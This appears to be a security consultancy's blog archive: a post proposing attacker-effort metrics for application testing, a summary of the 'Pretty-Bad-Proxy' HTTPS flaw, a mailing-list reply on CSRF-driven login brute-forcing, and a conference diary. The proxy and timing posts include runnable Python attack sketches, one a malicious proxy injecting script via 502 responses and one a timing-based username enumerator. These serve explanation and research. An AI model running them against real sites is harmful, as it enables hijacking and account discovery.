A longish post, but this wasn't going to fit into 140 characters. It's an argument about security metrics: the claim is that pure vulnerability-count metrics are insufficient for describing an organisation's application (in)security, and an alternative approach is suggested. Comments welcome.
Apart from the two bookends (SOSS and DBIR), other metrics are also published.
From a testing perspective, WhiteHat releases perhaps the best-known set of appsec bug metrics, and in years gone by Corsaire released statistics covering their customers. In 2008, WASC also undertook a project to provide metrics with data sourced from a number of companies, though it has not seen recent activity (the last edit on the site was over a year ago). WhiteHat's metrics measure the number of serious vulnerabilities in each site (High, Critical, Urgent) and then slice and dice this based on the vulnerability's classification, the organisation's size, and the vertical within which it operates. WhiteHat is also in the fairly unique position of being able to record remediation times with higher granularity than appsec firms that engage with customers through projects rather than service contracts. Corsaire's approach was slightly different; they recorded metrics in terms of the classification of the vulnerability, its impact and the year in which the issue was found. Their report contained similar metrics to WhiteHat's (e.g. % of apps with XSS), but the inclusion of data from multiple years permitted them to extract trends. (No doubt WhiteHat have trending data, but it was absent from their last report.) Lastly, WASC's approach is very similar to WhiteHat's, in that a point in time is selected and vulnerability counts according to impact and classification are provided for that point.
Essentially, each of these approaches uses a base metric of vulnerability tallies, which are then viewed from different angles (classification, time-series, impact). While the metrics are collected per application, they are easily aggregated per organisation.
At the extreme edge of ideal metrics, the ability to factor in chains of vulnerabilities that individually present little risk, but whose combined risk is greater than the sum of the parts, would be fantastic. This aspect is ignored by most (including us), as a fruitful path isn't clear.
One could just as easily claim that absolute bug counts are irrelevant and that they need to be relative to some other scale, commonly the number of applications an organisation has. However, if the metrics don't provide enough granularity to accurately position your organisation with respect to the others you actually care about, then they're worthless for decision making. What drives many of our customers is not where they stand in relation to every other organisation, but specifically their peers and competitors. It's slightly ironic that, oftentimes, the broader the sample behind published metrics, the less applicable they are to individual companies. As a bank, knowing you're in the top 10% of a sample of banking organisations means something; being in the top 10% of a survey that includes WebGoat clones means much less.
In Seven Myths About Information Security Metrics, Dr Hinson raises a number of interesting points about security metrics. They're mostly applicable to security awareness, but they also carry across into other security activities. At least two serve my selfish needs, so I'll quote them here:
Myth 1: Metrics must be “objective” and “tangible”

There is a subtle but important distinction between measuring subjective factors and measuring subjectively. It is relatively easy to measure “tangible” or objective things (the number of virus incidents, or the number of people trained). This normally gives a huge bias towards such metrics in most measurement systems, and a bias against measuring intangible things (such as level of security awareness). In fact, “intangible” or subjective things can be measured objectively, but we need to be reasonably smart about it (e.g., by using interviews, surveys and audits). Given the intangible nature of security awareness, it is definitely worth putting effort into the measurement of subjective factors, rather than relying entirely on easy-to-measure but largely irrelevant objective factors. [G Hinson]
Myth 3: We need absolute measurements

For some unfathomable reason, people often assume we need “absolute measures”—height in meters, weight in pounds, etc. This is nonsense!

If I line up the people in your department against a wall, I can easily tell who is tallest, with no rulers in sight. This yet again leads to an unnecessary bias in many measurement systems. In fact, relative values are often more useful than absolute scales, especially to drive improvement. Consider this for instance: “Tell me, on an (arbitrary) scale from one to ten, how security aware the people in your department are. OK, I'll be back next month to ask you the same question!” We need not define the scale formally, as long as the person being asked (a) has his own mental model of the processes and (b) appreciates the need to improve them. We needn't even worry about minor variations in the scoring scale from month to month, as long as our objective of promoting improvement is met. Benchmarking and best practice transfer are good examples of this kind of thinking. “I don't expect us to be perfect, but I'd like us to be at least as good as standard X or company Y.” [G Hinson]
While he writes from the view of an organisation trying to decide whether its security awareness program is yielding dividends, the core statements are applicable to organisations seeking to determine the efficacy of their software security program. I'm particularly drawn to two points: the first is that intangibles are as useful as concrete metrics, and the second is that absolute measurements aren't necessary; comparative ordering is sometimes enough.
Measuring effort, or attacker cost, is not new to security, but it's mostly done indirectly through the sale of exploits (e.g. iDefence, ZDI). Even here, effort is not directly related to the purchase price, which is also influenced by other factors such as the number of deployed targets. In any case, for the custom applications testers are mostly presented with, such public sources are of little help (if your testers are submitting findings to ZDI, you have bigger problems). Every now and then an exploit dev team will mention how long it took them to write an exploit for some weird Windows bug; these are always interesting data points, but they're not specific enough for customers and the sample size is low.
Ideally, any measure of an attacker's cost would take into account both time and the attacker's exclusivity (or experience); in practice, however, this will be tough to gather from your testers. One could base it on their hourly rate, if your testing company differentiates between resources. Where they don't, or you're seeking to keep the metric simple, another estimate for effort is the number of days spent on testing.
Returning to our sample companies: if the Visigoths' 5 vulnerabilities each required, on average, a single day to find, while the Ostrogoths' 20 bugs averaged 5 days each, then the effort required by an attacker is minimised by choosing to target the Visigoths. In other words, one might argue that the Visigoths are more at risk than the Ostrogoths.
With this base metric, it's then possible to capture historical assessment data and provide both internal-looking metrics for an organisation and comparative metrics, if the testing company is also employed by your competitors. Internal metrics are the usual kinds (impact, classification, time-series), but the comparison option is very interesting. We're in the fortunate position of working with many top companies locally, and are able to compare competitors using this metric as a base. The actual ranking formula is largely unimportant here. Naturally, data must be anonymised so as to protect names; one could provide the customer with their rank only. In this way, the customer has an independent notion of how their security activities rate against their peers, without embarrassing the peers.
Inverting the findings-per-day metric provides the average number of days needed to find a particular class of vulnerability, or impact level. That is, if a client averages 0.7 High or Critical findings per testing day, then on average it takes us roughly 1.4 days of testing to find an issue of great concern, which is an easy way of expressing the base metric.
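As a rough sketch of the arithmetic (in Python, purely illustrative; the figures are the hypothetical ones used above):

```python
# Toy calculation of the attacker-effort metric: average testing days per finding.

def days_per_finding(total_testing_days, findings):
    """Average effort (testing days) needed to surface one finding."""
    return total_testing_days / findings

# Visigoths: 5 vulnerabilities at roughly a day each to find.
visigoths = days_per_finding(total_testing_days=5, findings=5)      # 1.0 day per bug
# Ostrogoths: 20 vulnerabilities at roughly 5 days each to find.
ostrogoths = days_per_finding(total_testing_days=100, findings=20)  # 5.0 days per bug

# Lower effort per finding means a cheaper target, so the Visigoths carry more risk.
assert visigoths < ostrogoths

# Inverting findings-per-day gives the same figure from the other direction:
# 0.7 high/critical findings per testing day is roughly 1.4 days per serious issue.
print(round(1 / 0.7, 1))  # 1.4
```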
As mentioned above, a minimum number of assessments is needed before the metric becomes reliable; this hints at a deeper problem, namely that randomly selected project days are not independent. An analyst stuck on a 4-week project is focused on a very small part of the broader organisation's application landscape. We counter this bias by including as many projects of the same type as possible.
This metric would also be very useful to include in each subsequent report for the customer, with every report containing an evaluation against their long-term vulnerability averages.
As mentioned above, a key test for metrics is whether they support decision making, and the feedback from the client was positive in this regard.
This idea is still being fleshed out. If you're aware of previous work in this regard or have suggestions on how to improve it (even abandon it) please get in contact.
Oh, and if you've read this far and are looking for training, we're at BH in August.
Ron Auger sent an email to the [WASC Mail list] on some fine work presented recently by Microsoft Research. The paper (and accompanying PPT), titled [Pretty-Bad-Proxy: An Overlooked Adversary in Browsers' HTTPS Deployments], is pretty cool and shows several techniques by which a malicious inline proxy can sniff SSL sessions passing through it. It's genuinely a bunch of cool findings and has been handled neatly (with the exception of some shocking clipart!).
The attack logic is fairly simple. The user tries to browse to https://mybank.com. The browser sends a CONNECT request to the proxy. The proxy returns an HTTP 502 proxy error message. The magic comes in here: the browser interprets the returned 502 message within the security context of https://mybank.com.
So the attack works as follows:

1. The victim's browser is configured to use the attacker's (or an attacker-controlled) proxy.
2. The victim browses to https://mybank.com, and the browser issues a CONNECT request to the proxy to set up the SSL tunnel.
3. Instead of tunnelling the connection, the malicious proxy replies with an HTTP 502 error page containing attacker-supplied HTML and script.
4. The browser renders that error page within the security context of https://mybank.com, so the attacker's script runs in the bank's origin even though SSL itself is never broken.
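Just to make the mechanics concrete, here's a minimal, purely illustrative Python sketch of the proxy side (the port, hostname and payload are made up, and this is obviously not the code from the paper):

```python
# Minimal sketch of the malicious-proxy side of the 502 trick (illustrative only).
# Assumes the victim's browser is configured to use this host as its HTTP proxy.
import socket

PAYLOAD = (b"<html><body><script>/* attacker script; on a vulnerable browser this "
           b"ran in the https://mybank.com origin */</script></body></html>")

def serve(port=8080):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(5)
    while True:
        client, _ = srv.accept()
        request = client.recv(4096)
        # Browsers ask the proxy for an SSL tunnel: "CONNECT mybank.com:443 HTTP/1.1"
        if request.startswith(b"CONNECT"):
            # Instead of tunnelling, answer with an error page carrying our HTML;
            # vulnerable browsers rendered this body in the intended HTTPS context.
            client.sendall(b"HTTP/1.1 502 Bad Gateway\r\n"
                           b"Content-Type: text/html\r\n"
                           b"Content-Length: " + str(len(PAYLOAD)).encode() + b"\r\n"
                           b"\r\n" + PAYLOAD)
        client.close()

if __name__ == "__main__":
    serve()
```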
With a little more arm-bending, the paper even goes on to remove the necessity of fully controlling an evil proxy, relying instead on an attacker on the local network sniffing traffic and then racing the valid proxy server.
The findings have been disclosed to the browser vendors and have already been remediated, which means we can collectively breathe a sigh of relief; but clearly, it has not been a good year for SSL (and SSL implementations).
Rob had a rant on his site on the timing attack, with a CSRF twist.. We met him after our Vegas talk, but I'm not really sure how his attack differs from our published one..
My on-list response:
-snip- From: haroon meer
To: email@example.com Cc: firstname.lastname@example.org Subject: Re: [WEB SECURITY] Performing Distributed Brute Forcing of CSRF vulnerable login pages
Thanks for the kind words on the talk.. If you check out the visio at: http://www.sensepost.com/blogstatic/2007/08/dxsrt.png you will see that its pretty much the same attack.. In a shameless display of self-pimpage, check out the paper http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf from page 12.. Figure 23 for example shows the results in a victim/zombies browser, after he has visited our page.. Effectively he tries the userlist we send him (in this case on a standard squirrelmail login page). Once he detects a timing diff (again using a trivial algorithm to avoid latency disparity) he simply makes another request to the attacker to report his success..
We do give the important pieces of the script in the paper, but i suspect anyone with 2 minutes of time could have cobbled them together anyway..
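For anyone who wants to play with the underlying idea outside a browser, here's a minimal Python sketch of the timing-oracle portion only; the talk and paper drive this from the victim's browser in JavaScript, and the endpoint, field names and threshold below are illustrative assumptions rather than anything taken from our script:

```python
# Standalone sketch of timing-based username enumeration against a login page.
# The URL, form fields and 0.3s threshold are hypothetical, for illustration only.
import time
import urllib.parse
import urllib.request

TARGET = "http://example.org/squirrelmail/src/redirect.php"  # hypothetical login endpoint

def login_time(username, attempts=3):
    """Median time taken for a (failed) login attempt with this username."""
    samples = []
    for _ in range(attempts):
        data = urllib.parse.urlencode({"login_username": username, "secretkey": "x"}).encode()
        start = time.monotonic()
        try:
            urllib.request.urlopen(TARGET, data, timeout=10).read()
        except Exception:
            pass  # a failed or rejected login is still a usable timing sample
        samples.append(time.monotonic() - start)
    return sorted(samples)[len(samples) // 2]  # median smooths out latency jitter

baseline = login_time("no_such_user_zzz")
for candidate in ["admin", "alice", "bob"]:
    # A noticeably different response time suggests the account exists, since valid
    # users typically trigger extra server-side work (e.g. password hashing).
    if abs(login_time(candidate) - baseline) > 0.3:
        print("possible valid account:", candidate)
```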
OK.. so I'm in my room finally catching up on sleep (or will be in a few minutes) while most people are finishing Microsoft's booze at the PURE Microsoft party.. BlackHat is over, which means tomorrow we are off to the Riviera for DefCon..
Most of the SensePost'ers have been making notes so they can blog on the talks they attended.. this will filter through in the next few days.. I caught the Erratasec talk this morning, and have a few thoughts, but I'll wait till I have time to actually comment properly..
Last night we found a patch of parking lot for the first SensePost vs. BlackHat crew (.za vs USA?) soccer/football game.. We started off being kicked out of the Palace Ballroom and finished on a patch of ground outside, but it turned out to be awesome.. Ultimately, Bradley, Charl, Marco, Nick and I ended up taking on Grifter, DedHed, Joe Grand, Dave, and Chris(?) while j0hnny long was official photographer..
It was all-round awesomeness and probably the most fun I've personally had in Vegas in a while..
We promised to upload one of the tools we demo'd during the talk, so I'll do that in a few minutes..